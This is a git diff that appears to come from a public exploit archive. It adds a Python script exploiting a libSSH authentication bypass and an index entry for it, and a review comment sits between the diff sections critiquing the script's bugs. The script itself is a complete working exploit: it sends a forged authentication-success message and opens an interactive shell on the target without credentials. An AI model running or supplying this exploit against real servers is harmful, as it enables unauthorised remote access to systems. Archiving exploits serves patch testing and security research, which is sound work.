diff --git a/exploits/linux/remote/45638.py b/exploits/linux/remote/45638.py
new file mode 100755
index 000000000..c2c43d17e
--- /dev/null
+++ b/exploits/linux/remote/45638.py
@@ -0,0 +1,52 @@
+#!/usr/bin/env python3
+import paramiko
+import socket
+import argparse
+from sys import argv, exit
+
+
+parser = argparse.ArgumentParser(description="libSSH Authentication Bypass")
+parser.add_argument('--host', help='Host')
+parser.add_argument('-p', '--port', help='libSSH port', default=22)
+parser.add_argument('-log', '--logfile', help='Logfile to write conn logs', default="paramiko.log")
+
+args = parser.parse_args()
+
+
+def BypasslibSSHwithoutcredentials(hostname, port):
+
+ sock = socket.socket()
+ try:
+ sock.connect((str(hostname), int(port)))
+
+ message = paramiko.message.Message()
+ transport = paramiko.transport.Transport(sock)
+ transport.start_client()
+
+ message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
+ transport._send_message(message)
+
+ spawncmd = transport.open_session()
+ spawncmd.invoke_shell()
+ return 0
+
+ except paramiko.SSHException as e:
+ print("TCPForwarding disabled on remote/local server can't connect. Not Vulnerable")
+ return 1
+ except socket.error:
+ print("Unable to connect.")
+ return 1
+
+
+def main():
+ paramiko.util.log_to_file(args.logfile)
+ try:
+ hostname = args.host
+ port = args.port
+ except:
+ parser.print_help()
+ exit(1)
+ BypasslibSSHwithoutcredentials(hostname, port)
+
+if __name__ == '__main__':
+ exit(main())
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 2950df989..697137621 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
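Review bot: In 45638.py, `main()` discards the return value of `BypasslibSSHwithoutcredentials`, so `exit(main())` always exits with status 0 and the 0/1 result the function computes never reaches the caller; the last line of `main()` should be `return BypasslibSSHwithoutcredentials(hostname, port)`. The `except paramiko.SSHException` branch prints "Not Vulnerable" for every SSH-level failure and blames TCP forwarding, which the code never requests, so anyone using this to validate a patch should not read that message as proof the server is fixed and should confirm the installed libSSH version instead. `--host` is optional, so a missing value reaches `sock.connect` as the string "None" and typically surfaces as "Unable to connect."; `required=True` on that argument would make the bare `try/except` in `main()` unnecessary. The socket and transport are also never closed on any path.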
@@ -16876,6 +16876,7 @@ id,file,description,date,author,type,platform,port
 45574,exploits/windows/remote/45574.rb,"Delta Electronics Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (Metasploit)",2018-10-09,Metasploit,remote,windows,502
 45611,exploits/windows/remote/45611.c,"NoMachine < 5.3.27 - Remote Code Execution",2018-10-15,hyp3rlinx,remote,windows,
 45629,exploits/hardware/remote/45629.txt,"FLIR AX8 Thermal Camera 1.32.16 - Hard-Coded Credentials",2018-10-17,LiquidWorm,remote,hardware,
+45638,exploits/linux/remote/45638.py,"libSSH - Authentication Bypass",2018-10-18,"Dayanç Soyadlı",remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -40151,5 +40152,5 @@ id,file,description,date,author,type,platform,port
 45632,exploits/hardware/webapps/45632.txt,"TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure",2018-10-17,LiquidWorm,webapps,hardware,
 45633,exploits/php/webapps/45633.txt,"Time and Expense Management System 3.0 - 'table' SQL Injection",2018-10-17,"Ihsan Sencan",webapps,php,
 45635,exploits/php/webapps/45635.txt,"Learning with Texts 1.6.2 - 'start' SQL Injection",2018-10-18,"Ihsan Sencan",webapps,php,
-45636,exploits/php/webapps/45636.txt,"PHP-SHOP master 1.0 - Cross-Site Request Forgery (Add admin)",2018-10-18,"Alireza Norkazemi",webapps,php,80
+45636,exploits/php/webapps/45636.txt,"PHP-SHOP master 1.0 - Cross-Site Request Forgery (Add Admin)",2018-10-18,"Alireza Norkazemi",webapps,php,80
 45637,exploits/php/webapps/45637.txt,"OwnTicket 1.0 - 'TicketID' SQL Injection",2018-10-18,"Ihsan Sencan",webapps,php,